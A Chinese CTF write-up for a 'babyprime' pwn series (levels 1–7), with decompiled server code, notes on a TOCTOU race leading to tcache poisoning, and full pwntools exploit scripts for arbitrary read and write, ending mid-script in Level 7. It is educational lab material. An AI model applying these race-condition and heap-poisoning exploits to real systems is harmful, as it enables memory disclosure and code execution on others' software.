# 前言
盲猜这章是 FSOP 综合利用,但是看到第一题就傻眼了。预知后事如何,请看 wp(
# Level 1
## Information
- Category: Pwn
## Description
> Create and use arbitrary read primitives to read from the .bss.
## Write-up
本来以为这章顶多就是 Heap + FSOP 综合利用,但是没想到是 Race Conditions + Heap +
FSOP……没怎么做过 Race Condition 的我直接人傻了(
但是我又不想为此先去把 Race Conditions 那章做完,那咋办?忍了呗……相信自己的学习
能力<s>/自信</s>
~~敲黑板,像这样详细的 wp 我大概只会写这一次,后面的题就简单说思路,不细写了。~~
首先是下面这个好像很熟悉实则不然的多线程服务器,不讲了(
不记得的去看我的[笔记](https://www.cubeyond.net/posts/cs-notes/csapp/#network-pr
ogramming)复习吧~~~其实我一开始也忘差不多了(bushi~~
直接跟进到核心函数:
```c
int challenge()
{
int result; // eax
const char *v1; // rax
int v2; // ebx
char *s1_1; // rax
int v4; // [rsp+2Ch] [rbp-424h] BYREF
char s1[1032]; // [rsp+30h] [rbp-420h] BYREF
unsigned __int64 v6; // [rsp+438h] [rbp-18h]
v6 = __readfsqword(0x28u);
fwrite("Welcome to the message server!n", 1u, 0x1Fu, (FILE *)__readfsqword(0xF
FFFFFF8));
fwrite("Commands: malloc/free/scanf/printf/send_flag/quit.n", 1u, 0x33u, (FILE
*)__readfsqword(0xFFFFFFF8));
while ( 1 )
{
result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%1024s", s1);
if ( result == -1 )
break;
if ( !strcmp(s1, "printf") )
{
result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%d", &v4);
if ( result == -1 )
return result;
v1 = stored[v4] ? (const char *)*((_QWORD *)&messages + v4) : "NONE";
result = fprintf((FILE *)__readfsqword(0xFFFFFFF8), "MESSAGE: %sn", v1);
if ( result < 0 )
return result;
}
else if ( !strcmp(s1, "malloc") )
{
result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%d", &v4);
if ( result == -1 )
return result;
if ( !stored[v4] )
{
v2 = v4;
*((_QWORD *)&messages + v2) = malloc(0x400u);
}
stored[v4] = 1;
}
else if ( !strcmp(s1, "scanf") )
{
result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%d", &v4);
if ( result == -1 )
return result;
if ( stored[v4] )
s1_1 = (char *)*((_QWORD *)&messages + v4);
else
s1_1 = s1;
__isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%1024s", s1_1);
}
else if ( !strcmp(s1, "free") )
{
result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%d", &v4);
if ( result == -1 )
return result;
if ( stored[v4] )
free(*((void **)&messages + v4));
stored[v4] = 0;
}
else if ( !strcmp(s1, "send_flag") )
{
fwrite("Secret: ", 1u, 8u, (FILE *)__readfsqword(0xFFFFFFF8));
__isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%1024s", s1);
if ( (unsigned __int8)secret_correct(s1) )
{
fwrite("Authorized!n", 1u, 0xCu, (FILE *)__readfsqword(0xFFFFFFF8));
win();
}
else
{
fwrite("Not authorized!n", 1u, 0x10u, (FILE *)__readfsqword(0xFFFFFFF8))
;
}
}
else
{
result = strcmp(s1, "quit");
if ( !result )
return result;
fwrite("Unrecognized choice!n", 1u, 0x15u, (FILE *)__readfsqword(0xFFFFFFF
8));
}
}
return result;
}
```
咋一看还挺安全,没有溢出,没有 UAF,好像无懈可击的鸭子。
~~内心 OS: wth 第一题就这样恶心我!?那还学个屁,埋了吧(~~
好吧,稍微用心想想的话,其实还是有很大的问题的……注意,这是一个多线程服务器,允许
我们创建无限的连接进行交互,但是程序在操作 `stored` 全局数组的时候操作并不是 ato
mic 的,也没有为其加锁,那那那,na 这不就存在一个潜在的 race condition 吗?并且
在这种情况下可以归类为 `Time-of-Check to Time-of-Use (TOCTOU)` 型的条件竞争,因
为在每次操作前都检查了 stored 数组然后才执行操作,检查和实际 action 之间有一个 t
iny gap 可以被利用。最后,又因为 tcache 不检查 chunk metadata,所以接下来打一个
tcache poisoning 就可以任意读了。
其实我也不是完全不懂 race condition 的 xD,同样,忘记的可以看我[笔记](https://ww
w.cubeyond.net/posts/cs-notes/csapp/#processes)。
~~OK, 讲完了/逃 bro 现在凌晨三点,实在是不想写了,各位师傅还是直接看 exp 吧去感
悟吧,反正像这种菜鸟题也没人看(~~
## Exploit
```python
#!/usr/bin/env python3
import argparse
from pwn import (
ELF,
context,
flat,
os,
process,
raw_input,
remote,
)
parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread coun
t")
args = parser.parse_args()
FILE = "/challenge/babyprime_level1.0"
HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
libc = elf.libc
def printf(tid, idx):
thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx):
thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content):
thread[tid].sendline(f"scanf {idx} {content}".encode())
def free(tid, idx):
thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, secret):
thread[tid].sendline(b"send_flag")
thread[tid].sendlineafter(b"Secret: ", secret)
def quit(tid):
thread[tid].sendline(b"quit")
def arbitrary_read(addr):
while True:
thread[0].send((b"malloc 0 free 0n") * 10000)
if os.fork() == 0:
thread[1].send((b"scanf 0" + flat(addr) + b"n") * 10000)
os.kill(os.getpid(), 9)
os.wait()
malloc(0, 0)
printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ")
poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == flat(addr):
break
malloc(0, 1)
printf(0, 1)
thread[0].recvuntil(b"MESSAGE: ")
return thread[0].recvline().strip()
def mangle(pos, ptr, shifted=1):
if shifted:
return pos ^ ptr
return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1):
if shifted:
return mangle(pos, ptr)
return mangle(pos, ptr, 0)
def launch():
global target, thread
if args.L and args.threads is not None:
raise ValueError("Options -L and -T cannot be used together.")
if args.L:
target = process(FILE)
elif args.threads:
if args.threads <= 0:
raise ValueError("Thread count must be positive.")
process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
else:
target = remote(HOST, PORT, ssl=True)
def main():
launch()
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
malloc(0, 0)
malloc(0, 1)
printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ")
heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1)
thread[0].recvuntil(b"MESSAGE: ")
pos = int.from_bytes(thread[0].recvline().strip(), "little")
heap = demangle(heap, pos)
thread[0].success(f"pos: {hex(pos)}")
thread[0].success(f"heap: {hex(heap)}")
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
raw_input("DEBUG")
secret = 0x4054C0
secret = arbitrary_read(mangle(pos - 1, secret))
send_flag(0, secret)
quit(0)
quit(1)
thread[0].interactive()
if __name__ == "__main__":
main()
```
# Level 2
## Information
- Category: Pwn
## Description
> Create and use arbitrary read primitives to read from a thread's heap.
## Write-up
太简单不讲。
## Exploit
```python
#!/usr/bin/env python3
import argparse
from pwn import (
ELF,
context,
flat,
os,
process,
raw_input,
remote,
)
parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread coun
t")
args = parser.parse_args()
FILE = "/challenge/babyprime_level2.0"
HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
libc = elf.libc
def printf(tid, idx):
thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx):
thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content):
thread[tid].sendline(f"scanf {idx} {content}".encode())
def free(tid, idx):
thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, secret):
thread[tid].sendline(b"send_flag")
thread[tid].sendlineafter(b"Secret: ", secret)
def quit(tid):
thread[tid].sendline(b"quit")
def arbitrary_read(addr):
while True:
thread[0].send((b"malloc 0 free 0n") * 10000)
if os.fork() == 0:
thread[1].send((b"scanf 0" + flat(addr) + b"n") * 10000)
os.kill(os.getpid(), 9)
os.wait()
malloc(0, 0)
printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ")
poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == flat(addr):
break
malloc(0, 1)
printf(0, 1)
thread[0].recvuntil(b"MESSAGE: ")
return thread[0].recvline().strip()
def mangle(pos, ptr, shifted=1):
if shifted:
return pos ^ ptr
return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1):
if shifted:
return mangle(pos, ptr)
return mangle(pos, ptr, 0)
def launch():
global target, thread
if args.L and args.threads is not None:
raise ValueError("Options -L and -T cannot be used together.")
if args.L:
target = process(FILE)
elif args.threads:
if args.threads <= 0:
raise ValueError("Thread count must be positive.")
process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
else:
target = remote(HOST, PORT, ssl=True)
def main():
launch()
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
malloc(0, 0)
malloc(0, 1)
printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ")
heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1)
thread[0].recvuntil(b"MESSAGE: ")
pos = int.from_bytes(thread[0].recvline().strip(), "little")
heap = demangle(heap, pos)
thread[0].success(f"pos: {hex(pos)}")
thread[0].success(f"heap: {hex(heap)}")
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
raw_input("DEBUG")
secret = heap - 0x431
secret = arbitrary_read(mangle(pos - 1, secret))
thread[0].success(secret)
send_flag(0, secret)
quit(0)
quit(1)
thread[0].interactive()
if __name__ == "__main__":
main()
```
# Level 3
## Information
- Category: Pwn
## Description
> Create and use arbitrary read primitives to read from a thread's stack.
## Write-up
这次分配到线程栈上去了,线程栈和 libc 有固定偏移,所以弄到 libc 就知道栈地址了。
## Exploit
```python
#!/usr/bin/env python3
import argparse
from pwn import (
ELF,
context,
flat,
os,
process,
raw_input,
remote,
)
parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread coun
t")
args = parser.parse_args()
FILE = "/challenge/babyprime_level3.0"
HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
libc = elf.libc
def printf(tid, idx):
thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx):
thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content):
thread[tid].sendline(f"scanf {idx} {content}".encode())
def free(tid, idx):
thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, secret):
thread[tid].sendline(b"send_flag")
thread[tid].sendlineafter(b"Secret: ", secret)
def quit(tid):
thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr):
while True:
thread[0].send((f"malloc {poison_idx} free {poison_idx}n".encode()) * 10
000)
if os.fork() == 0:
thread[1].send(
(f"scanf {poison_idx}".encode() + flat(addr) + b"n") * 10000
)
os.kill(os.getpid(), 9)
os.wait()
malloc(0, poison_idx)
printf(0, poison_idx)
thread[0].recvuntil(b"MESSAGE: ")
poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == flat(addr):
break
malloc(0, result_idx)
raw_input("DEBUG")
printf(0, result_idx)
thread[0].recvuntil(b"MESSAGE: ")
return thread[0].recvline().strip()
def mangle(pos, ptr, shifted=1):
if shifted:
return pos ^ ptr
return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1):
if shifted:
return mangle(pos, ptr)
return mangle(pos, ptr, 0)
def launch():
global target, thread
if args.L and args.threads is not None:
raise ValueError("Options -L and -T cannot be used together.")
if args.L:
target = process(FILE)
elif args.threads:
if args.threads <= 0:
raise ValueError("Thread count must be positive.")
process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
else:
target = remote(HOST, PORT, ssl=True)
def main():
launch()
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
malloc(0, 0)
malloc(0, 1)
printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ")
heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1)
thread[0].recvuntil(b"MESSAGE: ")
pos = int.from_bytes(thread[0].recvline().strip(), "little")
heap = demangle(heap, pos)
main_arena_ptr = heap - 0xAA1
thread[0].success(f"pos: {hex(pos)}")
thread[0].success(f"heap: {hex(heap)}")
thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
libc.address = (
int.from_bytes(arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr)), "l
ittle")
- 0x219C80
)
secret = libc.address - 0x4740
thread[0].success(f"libc: {hex(libc.address)}")
thread[0].success(f"secret: {hex(secret)}")
malloc(0, 2)
malloc(0, 4)
free(0, 4)
free(0, 2)
raw_input("DEBUG")
secret = arbitrary_read(2, 4, mangle(pos, secret))
send_flag(0, secret)
quit(0)
quit(1)
thread[0].interactive()
if __name__ == "__main__":
main()
```
# Level 4
## Information
- Category: Pwn
## Description
> Create and use arbitrary read primitives to read from the .bss, now with PIE.
## Write-up
注意权限问题,`p2p` 是你的好朋友。好啦,尽情去寻找虚拟内存地址空间中那块属于你的
,闪闪发光的垃圾吧~
## Exploit
```python
#!/usr/bin/env python3
import argparse
from pwn import (
ELF,
context,
flat,
os,
process,
raw_input,
remote,
)
parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread coun
t")
args = parser.parse_args()
FILE = "/challenge/babyprime_level4.0"
HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
libc = elf.libc
def printf(tid, idx):
thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx):
thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content):
thread[tid].sendline(f"scanf {idx} {content}".encode())
def free(tid, idx):
thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, secret):
thread[tid].sendline(b"send_flag")
thread[tid].sendlineafter(b"Secret: ", secret)
def quit(tid):
thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr):
BAD_BYTES = {b"x20", b"x0c", b"x0a", b"x0d", b"x09", b"x0b"}
packed_addr = flat(addr)
if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
raise ValueError(
f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.he
x()}"
)
while True:
thread[0].send((f"malloc {poison_idx} free {poison_idx}n".encode()) * 10
000)
if os.fork() == 0:
thread[1].send(
(f"scanf {poison_idx}".encode() + flat(addr) + b"n") * 10000
)
os.kill(os.getpid(), 9)
os.wait()
malloc(0, poison_idx)
printf(0, poison_idx)
thread[0].recvuntil(b"MESSAGE: ")
poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr:
break
raw_input("DEBUG")
malloc(0, result_idx)
printf(0, result_idx)
thread[0].recvuntil(b"MESSAGE: ")
return thread[0].recvline().strip()
def mangle(pos, ptr, shifted=1):
if shifted:
return pos ^ ptr
return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1):
if shifted:
return mangle(pos, ptr)
return mangle(pos, ptr, 0)
def launch():
global target, thread
if args.L and args.threads is not None:
raise ValueError("Options -L and -T cannot be used together.")
if args.L:
target = process(FILE)
elif args.threads:
if args.threads <= 0:
raise ValueError("Thread count must be positive.")
process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
else:
target = remote(HOST, PORT, ssl=True)
def main():
launch()
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
malloc(0, 0)
malloc(0, 1)
printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ")
heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1)
thread[0].recvuntil(b"MESSAGE: ")
pos = int.from_bytes(thread[0].recvline().strip(), "little")
heap = demangle(heap, pos)
main_arena_ptr = heap - 0xAA1
thread[0].success(f"pos: {hex(pos)}")
thread[0].success(f"heap: {hex(heap)}")
thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")
raw_input("DEBUG")
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
libc.address = (
int.from_bytes(arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr)), "l
ittle")
- 0x219C80
)
ld_ptr = libc.address + 0x219010
thread[0].success(f"libc: {hex(libc.address)}")
thread[0].success(f"ld_ptr: {hex(ld_ptr)}")
raw_input("DEBUG")
malloc(0, 2)
malloc(0, 4)
free(0, 4)
free(0, 2)
ld = int.from_bytes(arbitrary_read(2, 4, mangle(pos, ld_ptr)), "little") - 0
x15C60
pie_ptr = ld + 0x3B2F0
thread[0].success(f"ld: {hex(ld)}")
thread[0].success(f"pie_ptr: {hex(pie_ptr)}")
raw_input("DEBUG")
malloc(0, 3)
malloc(0, 5)
free(0, 5)
free(0, 3)
elf.address = (
int.from_bytes(arbitrary_read(3, 5, mangle(pos, pie_ptr)), "little") - 0
x4CA8
)
secret_ptr = elf.address + 0x53C0
thread[0].success(f"pie: {hex(elf.address)}")
thread[0].success(f"secret: {hex(secret_ptr)}")
raw_input("DEBUG")
malloc(0, 6)
malloc(0, 7)
free(0, 7)
free(0, 6)
secret = arbitrary_read(6, 7, mangle(pos, secret_ptr + 0x3))
send_flag(0, secret)
quit(0)
quit(1)
thread[0].interactive()
if __name__ == "__main__":
main()
```
# Level 5
## Information
- Category: Pwn
## Description
> Create and use arbitrary read primitives to read from the environment.
## Write-up
探索探索内存,探探探就出来了。
## Exploit
```python
#!/usr/bin/env python3
import argparse
from pwn import (
ELF,
context,
flat,
os,
process,
raw_input,
remote,
)
parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread coun
t")
args = parser.parse_args()
FILE = "/challenge/babyprime_level5.0"
HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
libc = elf.libc
def printf(tid, idx):
thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx):
thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content):
thread[tid].sendline(f"scanf {idx} {content}".encode())
def free(tid, idx):
thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, secret):
thread[tid].sendline(b"send_flag")
thread[tid].sendlineafter(b"Secret: ", secret)
def quit(tid):
thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr):
BAD_BYTES = {b"x20", b"x0c", b"x0a", b"x0d", b"x09", b"x0b"}
packed_addr = flat(addr)
if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
raise ValueError(
f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.he
x()}"
)
while True:
thread[0].send((f"malloc {poison_idx} free {poison_idx}n".encode()) * 10
000)
if os.fork() == 0:
thread[1].send(
(f"scanf {poison_idx}".encode() + flat(addr) + b"n") * 10000
)
os.kill(os.getpid(), 9)
os.wait()
malloc(0, poison_idx)
printf(0, poison_idx)
thread[0].recvuntil(b"MESSAGE: ")
poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr:
break
raw_input("DEBUG")
malloc(0, result_idx)
printf(0, result_idx)
def mangle(pos, ptr, shifted=1):
if shifted:
return pos ^ ptr
return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1):
if shifted:
return mangle(pos, ptr)
return mangle(pos, ptr, 0)
def launch():
global target, thread
if args.L and args.threads is not None:
raise ValueError("Options -L and -T cannot be used together.")
if args.L:
target = process(FILE)
elif args.threads:
if args.threads <= 0:
raise ValueError("Thread count must be positive.")
process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
else:
target = remote(HOST, PORT, ssl=True)
def main():
launch()
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
malloc(0, 0)
malloc(0, 1)
printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ")
heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1)
thread[0].recvuntil(b"MESSAGE: ")
pos = int.from_bytes(thread[0].recvline().strip(), "little")
heap = demangle(heap, pos)
main_arena_ptr = heap - 0xAA1
thread[0].success(f"pos: {hex(pos)}")
thread[0].success(f"heap: {hex(heap)}")
thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")
raw_input("DEBUG")
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr))
thread[0].recvuntil(b"MESSAGE: ")
libc.address = int.from_bytes(thread[0].recvline().strip(), "little") - 0x21
9C80
known_values = libc.address + 0x21AEC0
thread[0].success(f"libc: {hex(libc.address)}")
thread[0].success(f"known_values: {hex(known_values)}")
raw_input("DEBUG")
malloc(0, 2)
malloc(0, 4)
free(0, 4)
free(0, 2)
arbitrary_read(2, 4, mangle(pos, known_values))
thread[0].recvuntil(b"MESSAGE: ")
secret = int.from_bytes(thread[0].recv(0x6), "little") - 0x30
thread[0].success(f"secret: {hex(secret)}")
raw_input("DEBUG")
malloc(0, 3)
malloc(0, 5)
free(0, 5)
free(0, 3)
arbitrary_read(3, 5, mangle(pos, secret + 0x10))
thread[0].recvuntil(b"MESSAGE: ")
secret = thread[0].recvline().strip()
thread[0].success(f"secret: {secret}")
send_flag(0, secret)
quit(0)
quit(1)
thread[0].interactive()
if __name__ == "__main__":
main()
```
# Level 6
## Information
- Category: Pwn
## Description
> Create and use arbitrary read primitives to read from the main heap.
## Write-up
培养内存侦查大头兵 ing……
## Exploit
```python
#!/usr/bin/env python3
import argparse
from pwn import (
ELF,
context,
flat,
os,
process,
raw_input,
remote,
)
parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread coun
t")
args = parser.parse_args()
FILE = "/challenge/babyprime_level6.0"
HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
libc = elf.libc
def printf(tid, idx):
thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx):
thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content):
thread[tid].sendline(f"scanf {idx} {content}".encode())
def free(tid, idx):
thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, secret):
thread[tid].sendline(b"send_flag")
thread[tid].sendlineafter(b"Secret: ", secret)
def quit(tid):
thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr):
BAD_BYTES = {b"x20", b"x0c", b"x0a", b"x0d", b"x09", b"x0b"}
packed_addr = flat(addr)
if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
raise ValueError(
f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.he
x()}"
)
while True:
thread[0].send((f"malloc {poison_idx} free {poison_idx}n".encode()) * 10
000)
if os.fork() == 0:
thread[1].send(
(f"scanf {poison_idx}".encode() + flat(addr) + b"n") * 10000
)
os.kill(os.getpid(), 9)
os.wait()
malloc(0, poison_idx)
printf(0, poison_idx)
thread[0].recvuntil(b"MESSAGE: ")
poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr:
break
raw_input("DEBUG")
malloc(0, result_idx)
printf(0, result_idx)
def mangle(pos, ptr, shifted=1):
if shifted:
return pos ^ ptr
return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1):
if shifted:
return mangle(pos, ptr)
return mangle(pos, ptr, 0)
def launch():
global target, thread
if args.L and args.threads is not None:
raise ValueError("Options -L and -T cannot be used together.")
if args.L:
target = process(FILE)
elif args.threads:
if args.threads <= 0:
raise ValueError("Thread count must be positive.")
process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
else:
target = remote(HOST, PORT, ssl=True)
def main():
launch()
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
malloc(0, 0)
malloc(0, 1)
printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ")
heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1)
thread[0].recvuntil(b"MESSAGE: ")
pos = int.from_bytes(thread[0].recvline().strip(), "little")
heap = demangle(heap, pos)
main_arena_ptr = heap - 0xAA1
thread[0].success(f"pos: {hex(pos)}")
thread[0].success(f"heap: {hex(heap)}")
thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")
raw_input("DEBUG")
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr))
thread[0].recvuntil(b"MESSAGE: ")
libc.address = int.from_bytes(thread[0].recvline().strip(), "little") - 0x21
9C80
heap_ptr = libc.address + 0x219CE0
thread[0].success(f"libc: {hex(libc.address)}")
thread[0].success(f"heap_ptr: {hex(heap_ptr)}")
raw_input("DEBUG")
malloc(0, 2)
malloc(0, 4)
free(0, 4)
free(0, 2)
arbitrary_read(2, 4, mangle(pos, heap_ptr))
thread[0].recvuntil(b"MESSAGE: ")
heap = int.from_bytes(thread[0].recvline().strip(), "little")
secret = heap - 0x2B0
thread[0].success(f"heap: {hex(heap)}")
thread[0].success(f"secret: {hex(secret)}")
raw_input("DEBUG")
malloc(0, 3)
malloc(0, 5)
free(0, 5)
free(0, 3)
arbitrary_read(3, 5, mangle(pos, secret))
thread[0].recvuntil(b"MESSAGE: ")
secret = thread[0].recvline().strip()
thread[0].success(f"secret: {secret}")
send_flag(0, secret)
quit(0)
quit(1)
thread[0].interactive()
if __name__ == "__main__":
main()
```
# Level 7
## Information
- Category: Pwn
## Description
> Create and use arbitrary read/write primitives to obtain the flag.
## Write-up
一开始被这个 `flag_seed` 函数迷惑了:
```c
unsigned __int64 flag_seed()
{
unsigned int seed; // [rsp+4h] [rbp-9Ch]
unsigned int i; // [rsp+8h] [rbp-98h]
int fd; // [rsp+Ch] [rbp-94h]
_QWORD buf[17]; // [rsp+10h] [rbp-90h] BYREF
unsigned __int64 v5; // [rsp+98h] [rbp-8h]
v5 = __readfsqword(0x28u);
memset(buf, 0, 128);
fd = open("/flag", 0);
if ( fd < 0 )
__assert_fail("fd >= 0", "/mnt/pwnshop/source.c", 0x2Bu, "flag_seed");
if ( read(fd, buf, 0x80u) <= 0 )
__assert_fail("read(fd, flag, 128) > 0", "/mnt/pwnshop/source.c", 0x2Cu, "fl
ag_seed");
seed = 0;
for ( i = 0; i <= 0x1F; ++i )
seed ^= *((_DWORD *)buf + (int)i);
srand(seed);
memset(buf, 0, 0x80u);
return v5 - __readfsqword(0x28u);
}
```
注意到 `open` flag 之后并没有 `close` 那个 fd,并且下面那个 `memset` 清空了内存
中的 flag,导致我的第一反应是想办法把 flag 读回内存……但又对 `open` 这种直接返回
file descriptor 的函数感到迷惑,不晓得如何将 flag 读出来……
后来问 AI,了解了 `_IO_underflow` 好像可以读文件,然后去改线程的 stdin,然并软。
我居然在最后浪费了差不多一天后才想到,我还可以尝试 getshell 啊,草!最后发现,on
e gadget 是正确执行了,但是没回显啊……再问 AI,得知 `execve` 会杀掉原进程的所有其
它线程,当前执行 execve 的这个线程变成新进程的 main thread,并且只会继承 `proces
s-level` 的资源,比如 fd table、cwd、environ、credentials 等,不会继承任何 threa
d-level 的东西。哦~这不就是 CSAPP `fork` 那课讲的吗,~~不好意思,记性不好(bush
i~~
所以解决方法也很简单,直接 `dup2` 重定向一下 `stdin` 和 `stdout` 就好了。由于我
们要 shell,所以 `stderr` 没啥用,况且子进程本来也没设置 `stderr`,直接忽视。
## Exploit
```python
#!/usr/bin/env python3
import argparse
from pwn import (
ELF,
FileStructure,
constants,
context,
flat,
os,
process,
raw_input,
remote,
)
parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread coun
t")
args = parser.parse_args()
FILE = "/challenge/babyprime_level7.0"
HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
libc = elf.libc
def printf(tid, idx):
thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx):
thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content):
thread[tid].sendline(f"scanf {idx} {content}".encode())
def scanf_raw(tid, idx, content):
thread[tid].sendline(f"scanf {idx} ".encode() + content)
def free(tid, idx):
thread[tid].sendline(f"free {idx}".encode())
def quit(tid):
thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr):
BAD_BYTES = {b"x20", b"x0c", b"x0a", b"x0d", b"x09", b"x0b"}
packed_addr = flat(addr)
if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
raise ValueError(
f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.he
x()}"
)
while True:
thread[0].send((f"malloc {poison_idx} free {poison_idx}n".encode()) * 10
000)
if os.fork() == 0:
thread[1].send(
(f"scanf {poison_idx}".encode() + packed_addr + b"n") * 10000
)
os.kill(os.getpid(), 9)
os.wait()
malloc(0, poison_idx)
printf(0, poison_idx)
thread[0].recvuntil(b"MESSAGE: ")
poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr:
break
raw_input("DEBUG")
malloc(0, result_idx)
printf(0, result_idx)
def arbitrary_write(poison_idx, result_idx, addr, content):
arbitrary_read(poison_idx, result_idx, addr)
raw_input("RAW SCANF")
scanf_raw(0, result_idx, content)
def mangle(pos, ptr, shifted=1):
if shifted:
return pos ^ ptr
return (pos >> 12) ^ ptr
